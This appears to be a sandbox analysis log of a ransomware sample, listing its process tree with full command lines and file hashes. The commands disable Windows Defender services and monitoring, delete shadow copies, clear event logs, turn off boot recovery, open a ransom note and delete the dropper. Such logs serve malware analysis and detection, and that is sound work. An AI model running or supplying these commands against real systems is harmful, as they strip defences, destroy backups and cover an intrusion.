C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2024
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1352
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1080
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1772 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:880
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1060 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1484 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2068 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2092 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2112
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2132 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2144
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2164 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2248 -
C:\Windows\system32\notepad.exenotepad.exe C:\n8pw_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2580 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵PID:2588
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2608
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD551130561d2e22c25f9e6fe284de11ef2
SHA1583784e227e6c22a304088908ceb9211eaed4dae
SHA256b3ac1c99c19aad0eed4ed93ccb9b8dae37440751ea61c470f44da767a4d64ac9
SHA512e4adfbaacbce53c4910e26d93c82f70bd8418ed560246719061fd0fd5983d00920efdd421b8f4c0a06de3fe4488d41849fbfa5744c46b593fa0490418d59cf68
-
MD5
d3eca3baec61c36c9353ef1699b8bfca
SHA1f084193262e0d462165cfac58e1422ab90df7514
SHA2563ef5776a2dfd960f996ab765efa2b117d3e3135dc8e196aa7bdc525bd4125678
SHA5128d8eb00e0764ea07a999d0f07bd21f4f4b8169f19673de0cea833670c38edd41792136a63036477bebeb2a0fbbca5f4faafb381f8fd4ffb178d4209e073e2a17